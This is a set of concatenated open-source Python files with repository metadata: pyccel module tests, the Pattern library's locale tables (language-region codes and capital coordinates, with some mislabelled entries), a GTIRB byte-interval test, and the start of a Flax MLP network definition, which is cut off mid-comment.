assert np.allclose( x, x_expected, rtol=RTOL, atol=ATOL )
# ...
def test_module_3(language):
import modules.call_user_defined_funcs as mod
modnew = epyccel(mod, language=language)
r = 4.5
x_expected = mod.circle_volume(r)
x = modnew.circle_volume(r)
assert np.isclose( x, x_expected, rtol=RTOL, atol=ATOL )
i = np.random.randint(4,20)
n = np.random.randint(2,8)
arr = np.array(100*np.random.random_sample(n), dtype=int)
x_expected, y_expected = mod.alias(arr, i)
x, y = modnew.alias(arr, i)
assert np.allclose( x, x_expected, rtol=RTOL, atol=ATOL )
assert np.allclose( y, y_expected, rtol=RTOL, atol=ATOL )
assert x.dtype is x_expected.dtype
assert y.dtype is y_expected.dtype
def test_module_4(language):
import modules.Module_6 as mod
modnew = epyccel(mod, language=language)
n_x = np.random.randint(4,20)
n_y = np.random.randint(4,20)
x = np.empty(n_x, dtype=float)
y = np.random.random_sample(n_y)
x_pyc = x.copy()
y_pyc = y.copy()
max_pyt = mod.f(x,y)
max_pyc = modnew.f(x_pyc, y_pyc)
assert np.isclose( max_pyt, max_pyc, rtol=1e-14, atol=1e-14 )
assert np.allclose( x, x_pyc, rtol=1e-14, atol=1e-14 )
assert np.allclose( y, y_pyc, rtol=1e-14, atol=1e-14 )
def test_module_5(language):
import modules.Module_7 as mod
modnew = epyccel(mod, language=language)
max_pyt = mod.get_sum()
max_pyc = modnew.get_sum()
assert np.isclose( max_pyt, max_pyc, rtol=1e-14, atol=1e-14 )
max_pyt = mod.get_sum2()
max_pyc = modnew.get_sum2()
assert np.isclose( max_pyt, max_pyc, rtol=1e-14, atol=1e-14 )
def test_module_6(language):
import modules.consts as mod
modnew = epyccel(mod, language=language)
atts = ('g', 'R0', 'rMin', 'rMax', 'skip_centre',
'method', 'compl', 'tiny')
for att in atts:
mod_att = getattr(mod, att)
modnew_att = getattr(modnew, att)
assert mod_att == modnew_att
assert type(mod_att) is type(modnew_att)
def test_module_7(language):
import modules.array_consts as mod
modnew = epyccel(mod, language=language)
atts = ('a', 'b', 'c', 'd', 'e')
for att in atts:
mod_att = getattr(mod, att)
modnew_att = getattr(modnew, att)
assert np.array_equal(mod_att, modnew_att)
assert mod_att.dtype == modnew_att.dtype
assert np.array_equal(mod.F, modnew.F)
modnew.update_a()
mod.update_a()
mod_att = mod.a
modnew_att = modnew.a
assert np.array_equal(mod_att, modnew_att)
assert mod_att.dtype == modnew_att.dtype
mod.a[3] = 10
modnew.a[3] = 10
assert np.array_equal(mod_att, modnew_att)
assert mod.get_elem_a(3) == modnew.get_elem_a(3)
mod.c[1,0] = 10
modnew.c[1,0] = 10
assert np.array_equal(mod.c, modnew.c)
assert mod.get_elem_c(1,0) == modnew.get_elem_c(1,0)
mod.e[1,0,2] = 50
modnew.e[1,0,2] = 50
assert np.array_equal(mod.e, modnew.e)
assert mod.get_elem_e(1,0,2) == modnew.get_elem_e(1,0,2)
# Necessary as python does not reload modules
mod.reset_a()
mod.reset_c()
mod.reset_e()
def test_awkward_names(language):
import modules.awkward_names as mod
modnew = epyccel(mod, language=language)
assert mod.awkward_names == modnew.awkward_names
assert mod.a == modnew.a
assert mod.A == modnew.A
assert mod.function() == modnew.function()
assert mod.pure() == modnew.pure()
assert mod.allocate(1) == modnew.allocate(1)
|
1c1c5fa5376db3c640f15bcdf01b2c6a8ce8741f
|
95740c67e49e1528919eb8f96ae8086e7386e558
|
/project/reports/election_prediction/pattern/web/locale/__init__.py
|
9705b9891273f1a1f6177de8de421d02f06909b1
|
[
"MIT"
] |
permissive
|
mdeff/ntds_2016
|
5449fd5b7a1e4aa8721d0ae33a1f8a097f73b265
|
2d597838cb2688471cc6122a5570441585393148
|
refs/heads/master
| 2021-01-17T17:47:01.434340
| 2019-12-16T17:53:04
| 2019-12-16T17:53:04
| 69,178,943
| 109
| 51
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,710
|
py
|
__init__.py
|
#### PATTERN | WEB | LOCALE ########################################################################
# -*- coding: utf-8 -*-
# Copyright (c) 2010 University of Antwerp, Belgium
# Author: Tom De Smedt <tom@organisms.be>
# License: BSD (see LICENSE.txt for details).
# http://www.clips.ua.ac.be/pages/pattern
#### LANGUAGE & REGION #############################################################################
# IETF BCP 47 language-region code => (language, region, ISO-639 language code, ISO-3166 region code).
# Note: the list is incomplete (especially for African languages).
# Please help out by correcting errors and omissions.
LANGUAGE_REGION = {
u'aa-ET': (u'Afar', u'Ethiopia', u'aa', u'ET'),
u'af-ZA': (u'Afrikaans', u'South Africa', u'af', u'ZA'),
u'ar-AE': (u'Arabic', u'United Arab Emirates', u'ar', u'AE'),
u'ar-BH': (u'Arabic', u'Bahrain', u'ar', u'BH'),
u'ar-DZ': (u'Arabic', u'Algeria', u'ar', u'DZ'),
u'ar-EG': (u'Arabic', u'Egypt', u'ar', u'EG'),
u'ar-IQ': (u'Arabic', u'Iraq', u'ar', u'IQ'),
u'ar-JO': (u'Arabic', u'Jordan', u'ar', u'JO'),
u'ar-KW': (u'Arabic', u'Kuwait', u'ar', u'KW'),
u'ar-LB': (u'Arabic', u'Lebanon', u'ar', u'LB'),
u'ar-LY': (u'Arabic', u'Libya', u'ar', u'LY'),
u'ar-MA': (u'Arabic', u'Morocco', u'ar', u'MA'),
u'ar-OM': (u'Arabic', u'Oman', u'ar', u'OM'),
u'ar-QA': (u'Arabic', u'Qatar', u'ar', u'QA'),
u'ar-SA': (u'Arabic', u'Saudi Arabia', u'ar', u'SA'),
u'ar-SD': (u'Arabic', u'Sudan', u'ar', u'SD'),
u'ar-SY': (u'Arabic', u'Syria', u'ar', u'SY'),
u'ar-TN': (u'Arabic', u'Tunisia', u'ar', u'TN'),
u'ar-YE': (u'Arabic', u'Yemen', u'ar', u'YE'),
u'be-BY': (u'Belarusian', u'Belarus', u'be', u'BY'),
u'bg-BG': (u'Bulgarian', u'Bulgaria', u'bg', u'BG'),
u'ca-AD': (u'Catalan', u'Andorra', u'ca', u'AD'),
u'cs-CZ': (u'Czech', u'Czech Republic', u'cs', u'CZ'),
u'da-DK': (u'Danish', u'Denmark', u'da', u'DK'),
u'de-DE': (u'German', u'Germany', u'de', u'DE'),
u'de-AT': (u'German', u'Austria', u'de', u'AT'),
u'de-CH': (u'German', u'Switzerland', u'de', u'CH'),
u'de-LI': (u'German', u'Liechtenstein', u'de', u'LI'),
u'de-LU': (u'German', u'Luxembourg', u'de', u'LU'),
u'el-GR': (u'Greek', u'Greece', u'el', u'GR'),
u'en-AU': (u'English', u'Australia', u'en', u'AU'),
u'en-BZ': (u'English', u'Belize', u'en', u'BZ'),
u'en-CA': (u'English', u'Canada', u'en', u'CA'),
u'en-GB': (u'English', u'United Kingdom', u'en', u'GB'),
u'en-IE': (u'English', u'Ireland', u'en', u'IE'),
u'en-JM': (u'English', u'Jamaica', u'en', u'JM'),
u'en-KE': (u'English', u'Kenya', u'en', u'KE'),
u'en-NZ': (u'English', u'New Zealand', u'en', u'NZ'),
u'en-TT': (u'English', u'Trinidad', u'en', u'TT'),
u'en-US': (u'English', u'United States', u'en', u'US'),
u'en-ZA': (u'English', u'South Africa', u'en', u'ZA'),
u'es-ES': (u'Spanish', u'Spain', u'es', u'ES'),
u'es-AR': (u'Spanish', u'Argentina', u'es', u'AQ'),
u'es-BO': (u'Spanish', u'Bolivia', u'es', u'BO'),
u'es-CL': (u'Spanish', u'Chile', u'es', u'CL'),
u'es-CO': (u'Spanish', u'Colombia', u'es', u'CO'),
u'es-CR': (u'Spanish', u'Costa Rica', u'es', u'CR'),
u'es-DO': (u'Spanish', u'Dominican Republic', u'es', u'DO'),
u'es-EC': (u'Spanish', u'Ecuador', u'es', u'EC'),
u'es-GT': (u'Spanish', u'Guatemala', u'es', u'GT'),
u'es-HN': (u'Spanish', u'Honduras', u'es', u'HN'),
u'es-MX': (u'Spanish', u'Mexico', u'es', u'MX'),
u'es-NI': (u'Spanish', u'Nicaragua', u'es', u'NI'),
u'es-PA': (u'Spanish', u'Panama', u'es', u'PA'),
u'es-PE': (u'Spanish', u'Peru', u'es', u'PE'),
u'es-PR': (u'Spanish', u'Puerto Rico', u'es', u'PR'),
u'es-PY': (u'Spanish', u'Paraguay', u'es', u'PY'),
u'es-SV': (u'Spanish', u'El Salvador', u'es', u'SV'),
u'es-UY': (u'Spanish', u'Uruguay', u'es', u'UY'),
u'es-VE': (u'Spanish', u'Venezuela', u'es', u'VE'),
u'et-EE': (u'Estonian', u'Estonia', u'et', u'EE'),
u'eu-PV': (u'Basque', u'Basque Country', u'eu', u'PV'),
u'fa-IR': (u'Farsi', u'Iran', u'fa', u'IR'),
u'fi-FI': (u'Finnish', u'Finland', u'fi', u'FI'),
u'fo-FO': (u'Faeroese', u'Faroe Islands', u'fo', u'FO'),
u'fr-CG': (u'French', u'Congo', u'fr', u'CG'),
u'fr-FR': (u'French', u'France', u'fr', u'FR'),
u'fr-BE': (u'French', u'Belgium', u'fr', u'BE'),
u'fr-CA': (u'French', u'Canada', u'fr', u'CA'),
u'fr-CH': (u'French', u'Switzerland', u'fr', u'CH'),
u'fr-LU': (u'French', u'Luxembourg', u'fr', u'LU'),
u'ga-IE': (u'Irish' , u'Ireland', u'ga', u'IE'),
u'gd-UK': (u'Gaelic', u'Scotland', u'gd', u'UK'),
u'he-IL': (u'Hebrew', 'Israel', u'he', u'IL'),
u'hi-IN': (u'Hindi', u'India', u'hi', u'IN'),
u'hr-HR': (u'Croatian', u'Croatia', u'hr', u'HR'),
u'hu-HU': (u'Hungarian', u'Hungary', u'hu', u'HU'),
u'id-ID': (u'Indonesian', u'Indonesia', u'id', u'ID'),
u'is-IS': (u'Icelandic', u'Iceland', u'is', u'IS'),
u'it-IT': (u'Italian', u'Italy', u'it', u'IT'),
u'it-CH': (u'Italian', u'Switzerland', u'it', u'CH'),
u'ja-JA': (u'Japanese', u'Japan', u'ja', u'JA'),
u'ka-GE': (u'Georgian', u'Georgia', u'ka', u'GE'),
u'kg-CG': (u'Kongo', u'Congo', u'kg', u'CG'),
u'kl-GL': (u'Kalaallisut', u'Greenland', u'kl', u'GL'),
u'ko-KP': (u'Korean', u'Johab', u'ko', u'KP'),
u'ln-CG': (u'Lingala', u'Congo', u'ln', u'CG'),
u'lo-LA': (u'Lao', u'Lao', u'lo', u'LA'),
u'lt-LT': (u'Lithuanian', u'Lithuania', u'lt', u'LT'),
u'lv-LV': (u'Latvian', u'Latvia', u'lv', u'LV'),
u'mk-ML': (u'Macedonian', u'Macedonia', u'mk', u'MK'),
u'ms-MY': (u'Malaysian', u'Malaysia', u'ms', u'MY'),
u'mt-MT': (u'Maltese', u'Malta', u'mt', u'MT'),
u'nd-ZW': (u'Ndebele', u'Zimbabwe', u'nd', u'ZW'),
u'nl-NL': (u'Dutch', u'Netherlands', u'nl', u'NL'),
u'nl-BE': (u'Dutch', u'Belgium', u'nl', u'BE'),
u'no-NO': (u'Norwegian', u'Nynorsk', u'no', u'NO'),
u'om-ET': (u'Oromo', u'Ethiopia', u'om', u'ET'),
u'om-KE': (u'Oromo', u'Kenya', u'om', u'KE'),
u'pl-PL': (u'Polish', u'Poland', u'pl', u'PL'),
u'pt-MZ': (u'Portuguese', u'Mozambique', u'pt', u'PT'),
u'pt-PT': (u'Portuguese', u'Portugal', u'pt', u'PT'),
u'pt-BR': (u'Portuguese', u'Brazil', u'pt', u'BR'),
u'rm-IT': (u'Rhaeto-Romanic', u'Italy', u'rm', u'IT'),
u'ro-RO': (u'Romanian', u'Romania', u'ro', u'RO'),
u'ro-MO': (u'Romanian', u'Republic of Moldova', u'ro', u'MO'),
u'ru-RU': (u'Russian', u'Russia', u'ru', u'RU'),
u'rw-RW': (u'Kinyarwanda', u'Rwanda', u'rw', u'RW'),
u'sk-SK': (u'Slovak', u'Slovakia', u'sk', u'SK'),
u'sl-SI': (u'Slovenian', u'Slovenia', u'sl', u'SI'),
u'sm-SM': (u'Samoan', u'Samoa', u'sm', 'SM'),
u'so-KE': (u'Somali', u'Kenya', u'so', u'KE'),
u'so-SO': (u'Somali', u'Somalia', u'so', u'SO'),
u'sq-AL': (u'Albanian', u'Albania', u'sq', u'AL'),
u'sr-RS': (u'Serbian', u'Serbia', u'sr', u'RS'),
u'sv-SE': (u'Swedish', u'Sweden', u'sv', u'SE'),
u'sw-SW': (u'Swahili', u'Kenya', u'sw', u'KE'),
u'sw-TZ': (u'Swahili', u'Tanzania', u'sw', u'TZ'),
u'sv-FI': (u'Swedish', u'Finland', u'sv', u'FI'),
u'sx-ZA': (u'Sotho', u'South Africa', u'sx', u'ZA'),
u'sz-FI': (u'Sami', u'Sapmi', u'sz', u'FI'),
u'th-TH': (u'Thai', u'Thailand', u'th', u'TH'),
u'tn-BW': (u'Tswana', u'Botswana', u'tn', u'BW'),
u'to-TO': (u'Tonga', u'Tonga', u'to', u'TO'),
u'tr-TR': (u'Turkish', u'Turkey', u'tr', u'TR'),
u'ts-ZA': (u'Tsonga', u'South Africa', u'ts', u'ZA'),
u'uk-UA': (u'Ukrainian', u'Ukraine', u'uk', u'UA'),
u'ur-PK': (u'Urdu', u'Pakistan', u'ur', u'PK'),
u'uz-UZ': (u'Uzbek', u'Uzbekistan', u'uz', u'UZ'),
u've-ZA': (u'Venda', u'South Africa', u've', u'ZA'),
u'vi-VN': (u'Vietnamese', u'Vietnam', u'vi', u'VN'),
u'xh-ZA': (u'Xhosa', u'South Africa', u'xh', u'ZA'),
u'zh-CN': (u'Chinese', u'China', u'zh', u'CN'),
u'zh-HK': (u'Chinese', u'Hong Kong', u'zh', u'HK'),
u'zh-SG': (u'Chinese', u'Singapore', u'zh', u'SG'),
u'zh-TW': (u'Chinese', u'Taiwan', u'zh', u'TW'),
u'zu-ZA': (u'Zulu', u'South Africa', u'zu', u'ZA'),
u'zu-ZW': (u'Zulu', u'Zimbabwe', u'zu', u'ZW')
}
def encode_language(name):
""" Returns the language code for the given language name.
For example: encode_language("dutch") => "nl".
"""
for tag, (language, region, iso639, iso3166) in LANGUAGE_REGION.iteritems():
if language == name.capitalize():
return iso639
def decode_language(code):
""" Returns the language name for the given language code.
For example: decode_language("nl") => "Dutch".
"""
for tag, (language, region, iso639, iso3166) in LANGUAGE_REGION.iteritems():
if iso639 == code.lower():
return language
def encode_region(name):
""" Returns the region code for the given region name.
For example: encode_region("belgium") => "BE".
"""
for tag, (language, region, iso639, iso3166) in LANGUAGE_REGION.iteritems():
if region == name.capitalize():
return iso3166
def decode_region(code):
""" Returns the region name for the given region code.
For example: decode_region("be") => "Belgium".
"""
for tag, (language, region, iso639, iso3166) in LANGUAGE_REGION.iteritems():
if iso3166 == code.upper():
return region
def languages(region):
""" Returns a list of language codes for the given region code.
For example: languages(encode_region("belgium")) => ["fr", "nl"]
"""
v, a = region.upper(), []
for tag, (language, region, iso639, iso3166) in LANGUAGE_REGION.iteritems():
if iso3166 == v:
a.append(iso639)
return sorted(a)
def regions(language):
""" Returns a list of region codes for the given language code.
For example: regions(encode_language("dutch")) => ["NL", "BE"]
"""
x, a = language.lower(), []
for tag, (language, region, iso639, iso3166) in LANGUAGE_REGION.iteritems():
if iso639 == x:
a.append(iso3166)
return sorted(a, key=lambda tag: tag.lower() != x and tag or "")
def regionalize(language):
""" Returns a list of RFC-5646 language-region codes for the given language code.
For example: regionalize("nl") => ["nl-nl", "nl-be"]
"""
if not isinstance(language, basestring):
return []
if "-" in language:
language, region = language.split("-")
return [language.lower() + "-" + region.upper()] # nl-nl => nl-NL
main = lambda tag: tag in ("ar-AE", "en-US", "zh-CN") or tag[:2] == tag[3:].lower() # nl-NL
a = [language+"-"+r for r in regions(language.lower())]
a = sorted(a, key=main, reverse=True)
return a
def market(language):
""" Returns the first item from regionalize(language).
"""
a = regionalize(language)
a = len(a) > 0 and a[0] or None
return a
#print encode_language("dutch") # nl
#print decode_language("nl") # Dutch
#print encode_region("belgium") # BE
#print decode_region("be") # Belgium
#print languages("be") # ["fr", "nl"]
#print regions("nl") # ["NL", "BE"]
#print regionalize("nl") # ["nl-NL", "nl-BE"]
### GEOCODE ########################################################################################
# capital => (latitude, longitude, ISO-639 language code, region)
GEOCODE = {
u'Abu Dhabi': ( 24.467, 54.367, u"ar", u"United Arab Emirates"),
u'Abuja': ( 9.083, 7.533, u"en", u"Nigeria"),
u'Accra': ( 5.550, -0.217, u"en", u"Ghana"),
u'Algiers': ( 36.750, 3.050, u"ar", u"Algeria"),
u'Amman': ( 31.950, 35.933, u"ar", u"Jordan"),
u'Amsterdam': ( 52.383, 4.900, u"nl", u"Netherlands"),
u'Ankara': ( 39.933, 32.867, u"tr", u"Turkey"),
u'Astana': ( 51.167, 71.417, u"ru", u"Kazakhstan"),
u'Asuncion': (-25.267, -57.667, u"es", u"Paraguay"),
u'Athens': ( 37.983, 23.733, u"el", u"Greece"),
u'Baghdad': ( 33.333, 44.383, u"ar", u"Iraq"),
u'Bamako': ( 12.650, -8.000, u"fr", u"Mali"),
u'Bangkok': ( 13.750, 100.517, u"th", u"Thailand"),
u'Bangui': ( 4.367, 18.583, u"fr", u"Central African Republic"),
u'Beijing': ( 39.917, 116.383, u"zh", u"China"),
u'Beirut': ( 33.867, 35.500, u"ar", u"Lebanon"),
u'Belgrade': ( 44.833, 20.500, u"sr", u"Serbia"),
u'Berlin': ( 52.517, 13.400, u"de", u"Germany"),
u'Bern': ( 46.950, 7.433, u"de", u"Switzerland"),
u'Bissau': ( 11.850, -15.583, u"pt", u"Guinea"),
u'Bogota': ( 4.600, -74.083, u"es", u"Colombia"),
u'Brasilia': (-15.783, -47.917, u"pt", u"Brazil"),
u'Bratislava': ( 48.150, 17.117, u"sk", u"Slovakia"),
u'Brazzaville': ( -4.250, 15.283, u"fr", u"Congo"),
u'Brussels': ( 50.833, 4.333, u"nl", u"Belgium"),
u'Bucharest': ( 44.433, 26.100, u"ro", u"Romania"),
u'Budapest': ( 47.500, 19.083, u"hu", u"Hungary"),
u'Buenos Aires': (-34.600, -58.667, u"es", u"Argentina"),
u'Bujumbura': ( -3.367, 29.350, u"rn", u"Burundi"),
u'Cairo': ( 30.050, 31.250, u"ar", u"Egypt"),
u'Canberra': (-35.283, 149.217, u"en", u"Australia"),
u'Caracas': ( 10.500, -66.933, u"es", u"Venezuela"),
u'Chisinau': ( 47.000, 28.850, u"ro", u"Moldova"),
u'Colombo': ( 6.933, 79.850, u"si", u"Sri Lanka"),
u'Conakry': ( 9.550, -13.700, u"fr", u"Guinea"),
u'Copenhagen': ( 55.667, 12.583, u"da", u"Denmark"),
u'Dakar': ( 24.633, 46.717, u"fr", u"Senegal"),
u'Damascus': ( 33.500, 36.300, u"ar", u"Syria"),
u'Dar es Salaam': ( -6.800, 39.283, u"sw", u"Tanzania"),
u'Dhaka': ( 23.717, 90.400, u"bn", u"Bangladesh"),
u'Dublin': ( 53.317, -6.233, u"en", u"Ireland"),
u'Freetown': ( 8.500, -13.250, u"en", u"Sierra Leone"),
u'George Town': ( 19.300, -81.383, u"en", u"Malaysia"),
u'Georgetown': ( 6.800, -58.167, u"en", u"Guyana"),
u'Guatemala City': ( 14.617, -90.517, u"es", u"Guatemala"),
u'Hanoi': ( 21.033, 105.850, u"vi", u"Vietnam"),
u'Harare': (-17.833, 31.050, u"en", u"Zimbabwe"),
u'Havana': ( 23.117, -82.350, u"es", u"Cuba"),
u'Helsinki': ( 60.167, 24.933, u"fi", u"Finland"),
u'Islamabad': ( 33.700, 73.167, u"ur", u"Pakistan"),
u'Jakarta': ( -6.167, 106.817, u"ms", u"Indonesia"),
u'Jerusalem': ( 31.767, 35.233, u"he", u"Israel"),
u'Juba': ( 4.850, 31.617, u"en", u"Sudan"),
u'Kabul': ( 34.517, 69.183, u"fa", u"Afghanistan"),
u'Kampala': ( 0.317, 32.417, u"en", u"Uganda"),
u'Kathmandu': ( 27.717, 85.317, u"ne", u"Nepal"),
u'Khartoum': ( 15.600, 32.533, u"ar", u"Sudan"),
u'Kiev': ( 50.433, 30.517, u"rw", u"Ukraine"),
u'Kigali': ( -1.950, 30.067, u"en", u"Rwanda"),
u'Kingston': ( 18.000, -76.800, u"fr", u"Jamaica"),
u'Kinshasa': ( -4.317, 15.300, u"ms", u"Congo"),
u'Kuala Lumpur': ( 3.167, 101.700, u"ar", u"Malaysia"),
u'Kuwait City': ( 29.367, 47.967, u"uk", u"Kuwait"),
u'La Paz': (-16.500, -68.150, u"es", u"Bolivia"),
u'Lima': (-12.050, -77.050, u"es", u"Peru"),
u'Lisbon': ( 38.717, -9.133, u"pt", u"Portugal"),
u'Ljubljana': ( 46.050, 14.517, u"sl", u"Slovenia"),
u'Lome': ( 6.133, 1.217, u"fr", u"Togo"),
u'London': ( 51.500, -0.167, u"en", u"United Kingdom"),
u'Luanda': ( -8.833, 13.233, u"pt", u"Angola"),
u'Lusaka': (-15.417, 28.283, u"en", u"Zambia"),
u'Luxembourg': ( 49.600, 6.117, u"cd", u"Luxembourg"),
u'Madrid': ( 40.400, -3.683, u"es", u"Spain"),
u'Managua': ( 12.150, -86.283, u"es", u"Nicaragua"),
u'Manila': ( 14.583, 121.000, u"tl", u"Philippines"),
u'Maputo': (-25.950, 32.583, u"pt", u"Mozambique"),
u'Mexico City': ( 19.433, -99.133, u"es", u"Mexico"),
u'Minsk': ( 53.900, 27.567, u"be", u"Belarus"),
u'Mogadishu': ( 2.067, 45.367, u"so", u"Somalia"),
u'Monaco': ( 43.733, 7.417, u"fr", u"Monaco"),
u'Monrovia': ( 6.300, -10.800, u"en", u"Liberia"),
u'Montevideo': (-34.883, -56.183, u"es", u"Uruguay"),
u'Moscow': ( 55.750, 37.583, u"ru", u"Russia"),
u'Muscat': ( 23.617, 58.583, u"ar", u"Oman"),
u'Nairobi': ( -1.283, 36.817, u"en", u"Kenya"),
u'Nassau': ( 25.083, -77.350, u"en", u"Bahamas"),
u'New Delhi': ( 28.600, 77.200, u"hi", u"India"),
u'New York': ( 40.756, -73.987, u"en", u"United States"),
u'Niamey': ( 13.517, 2.117, u"fr", u"Niger"),
u'Oslo': ( 59.917, 10.750, u"no", u"Norway"),
u'Ottawa': ( 45.417, -75.700, u"en", u"Canada"),
u'Panama City': ( 8.967, -79.533, u"es", u"Panama"),
u'Paris': ( 48.867, 2.333, u"fr", u"France"),
u'Philipsburg': ( 18.017, -63.033, u"en", u"Sint Maarten"),
u'Phnom Penh': ( 11.550, 104.917, u"km", u"Cambodia"),
u'Port Louis': (-20.150, 57.483, u"en", u"Mauritius"),
u'Port-au-Prince': ( 18.533, -72.333, u"fr", u"Haiti"),
u'Porto-Novo': ( 6.483, 2.617, u"fr", u"Benin"),
u'Prague': ( 50.083, 14.467, u"cs", u"Czech Republic"),
u'Pretoria': (-25.700, 28.217, u"xh", u"South Africa"),
u'Pyongyang': ( 39.017, 125.750, u"ko", u"North Korea"),
u'Quito': ( -0.217, -78.500, u"es", u"Ecuador"),
u'Rabat': ( 34.017, -6.817, u"ar", u"Morocco"),
u'Rangoon': ( 16.800, 96.150, u"my", u"Myanmar"),
u'Reykjavik': ( 64.150, -21.950, u"is", u"Iceland"),
u'Riga': ( 56.950, 24.100, u"lv", u"Latvia"),
u'Riyadh': ( 24.633, 46.717, u"ar", u"Saudi Arabia"),
u'Rome': ( 41.900, 12.483, u"it", u"Italy"),
u'Saipan': ( 15.200, 145.750, u"en", u"Saipan"),
u'San Jose': ( 9.933, -84.083, u"es", u"Costa Rica"),
u'San Juan': ( 18.467, -66.117, u"es", u"Puerto Rico"),
u'San Marino': ( 43.933, 12.417, u"it", u"San Marino"),
u'San Salvador': ( 13.700, -89.200, u"es", u"El Salvador"),
u'Sanaa': ( 15.350, 44.200, u"ar", u"Yemen"),
u'Santiago': (-33.450, -70.667, u"es", u"Chile"),
u'Santo Domingo': ( 18.467, -69.900, u"es", u"Domenican Republic"),
u'Sarajevo': ( 43.867, 18.417, u"bo", u"Bosnia and Herzegovina"),
u'Seoul': ( 37.550, 126.983, u"ko", u"South Korea"),
u'Singapore': ( 1.283, 103.850, u"en", u"Singapore"),
u'Skopje': ( 42.000, 21.433, u"mk", u"Macedonia"),
u'Sofia': ( 42.683, 23.317, u"bg", u"Bulgaria"),
u'Stockholm': ( 59.333, 18.050, u"sv", u"Sweden"),
u'Taipei': ( 25.050, 121.500, u"zh", u"China"),
u'Tallinn': ( 59.433, 24.717, u"et", u"Estonia"),
u'Tashkent': ( 41.333, 69.300, u"uz", u"Uzbekistan"),
u'Tegucigalpa': ( 14.100, -87.217, u"es", u"Honduras"),
u'Tehran': ( 35.667, 51.417, u"fa", u"Iran"),
u'Tirana': ( 41.317, 19.817, u"sq", u"Albania"),
u'Tokyo': ( 35.683, 139.750, u"ja", u"Japan"),
u'Torshavn': ( 62.017, -6.767, u"fo", u"Faroe Islands"),
u'Tripoli': ( 32.883, 13.167, u"ar", u"Libya"),
u'Tunis': ( 36.800, 10.183, u"ar", u"Tunis"),
u'Vaduz': ( 47.133, 9.517, u"de", u"Liechtenstein"),
u'Vatican City': ( 41.900, 12.450, u"it", u"Vatican City"),
u'Vienna': ( 48.200, 16.367, u"de", u"Austria"),
u'Vientiane': ( 17.967, 102.600, u"lo", u"Laos"),
u'Vilnius': ( 54.683, 25.317, u"lt", u"Lithuania"),
u'Warsaw': ( 52.250, 21.000, u"pl", u"Poland"),
u'Washington.': ( 38.883, -77.033, u"en", u"United States"),
u'Wellington': (-41.467, 174.850, u"en", u"New Zealand"),
u'Yamoussoukro': ( 6.817, -5.283, u"fr", u"Côte d'Ivoire"),
u'Yaounde': ( 3.867, 11.517, u"en", u"Cameroon"),
u'Zagreb': ( 45.800, 16.000, u"hr", u"Croatia")
}
def geocode(location):
""" Returns a (latitude, longitude, language code, region)-tuple
for the given city (mostly capitals).
"""
if location in GEOCODE:
return GEOCODE[location]
for k, v in GEOCODE.items():
if location.lower() == k.lower():
return v
|
68f5f98aed53953721cd0479ed12a694d075e457
|
25a08bdeb17a0dc032ddf6c11b71693ca4c1a6cd
|
/python/tests/test_byte_intervals_at.py
|
ddf6fe981f46cd1bad320a75159b739bc9dc148c
|
[
"MIT"
] |
permissive
|
GrammaTech/gtirb
|
20b05dc6170d93af8cc29fd65f7094bd59a9fb4d
|
f4301401a0d98a783e3b6f40e390fe9b1b1d386d
|
refs/heads/master
| 2023-08-18T12:17:45.797733
| 2023-08-14T23:28:22
| 2023-08-15T12:02:48
| 136,977,182
| 277
| 40
|
MIT
| 2019-01-08T01:43:01
| 2018-06-11T20:25:41
|
C++
|
UTF-8
|
Python
| false
| false
| 1,652
|
py
|
test_byte_intervals_at.py
|
import unittest
import gtirb
from helpers import SearchScope, parameterize_one
class ByteIntervalsAtTests(unittest.TestCase):
@parameterize_one(
"scope", (SearchScope.ir, SearchScope.module, SearchScope.section)
)
def test_byte_intervals_at(self, scope):
ir = gtirb.IR()
m = gtirb.Module(name="test", ir=ir)
s = gtirb.Section(module=m)
search_in = scope.select(ir, m, s, None)
bi1 = gtirb.ByteInterval(address=0x1000, size=4, section=s)
bi2 = gtirb.ByteInterval(address=0x1004, size=4, section=s)
found = set(search_in.byte_intervals_at(0x1000))
self.assertEqual(found, {bi1})
found = set(search_in.byte_intervals_at(0x1001))
self.assertEqual(found, set())
found = set(search_in.byte_intervals_at(range(0x1000, 0x1008)))
self.assertEqual(found, {bi1, bi2})
found = set(search_in.byte_intervals_at(range(0x1000, 0x1008, 16)))
self.assertEqual(found, {bi1})
# Change the address to verify we update the index
bi2.address = 0x2000
found = set(search_in.byte_intervals_at(0x1004))
self.assertEqual(found, set())
found = set(search_in.byte_intervals_at(0x2000))
self.assertEqual(found, {bi2})
# Discard the interval to verify we update the index
bi2.section = None
found = set(search_in.byte_intervals_at(0x2000))
self.assertEqual(found, set())
# Now add it back to verify we update the index
s.byte_intervals.add(bi2)
found = set(search_in.byte_intervals_at(0x2000))
self.assertEqual(found, {bi2})
|
7bfabcb3eb54b485eefeb1d75d6453163fabd31e
|
9b59c5ce1b57b8bd066fcee4b55c821893bc50fb
|
/balloon_learning_environment/agents/networks.py
|
9fc9db4d81c58206988568c5c4fe02b91e7e94e9
|
[
"Apache-2.0"
] |
permissive
|
google/balloon-learning-environment
|
b485c62bab04ce8308ed8de3358d4303e601cf18
|
72082feccf404e5bf946e513e4f6c0ae8fb279ad
|
refs/heads/master
| 2023-08-31T04:41:02.819901
| 2022-12-19T17:14:38
| 2022-12-19T17:18:57
| 418,619,484
| 108
| 14
|
Apache-2.0
| 2023-08-16T23:21:29
| 2021-10-18T18:20:09
|
Python
|
UTF-8
|
Python
| false
| false
| 3,593
|
py
|
networks.py
|
# coding=utf-8
# Copyright 2022 The Balloon Learning Environment Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A common set of networks available for agents."""
from absl import logging
from dopamine.discrete_domains import atari_lib
from flax import linen as nn
import gin
import jax
import jax.numpy as jnp
@gin.configurable
class MLPNetwork(nn.Module):
"""A simple MLP network."""
num_actions: int
num_layers: int = gin.REQUIRED
hidden_units: int = gin.REQUIRED
is_dopamine: bool = False
@nn.compact
def __call__(self, x: jnp.ndarray):
# This method sets up the MLP for inference, using the specified number of
# layers and units.
logging.info('Creating MLP network with %d layers and %d hidden units',
self.num_layers, self.hidden_units)
# Network initializer.
kernel_initializer = jax.nn.initializers.glorot_uniform()
x = x.astype(jnp.float32) # Convert to JAX float32 type.
x = x.reshape(-1) # Flatten.
# Pass through the desired number of hidden layers (we do this for
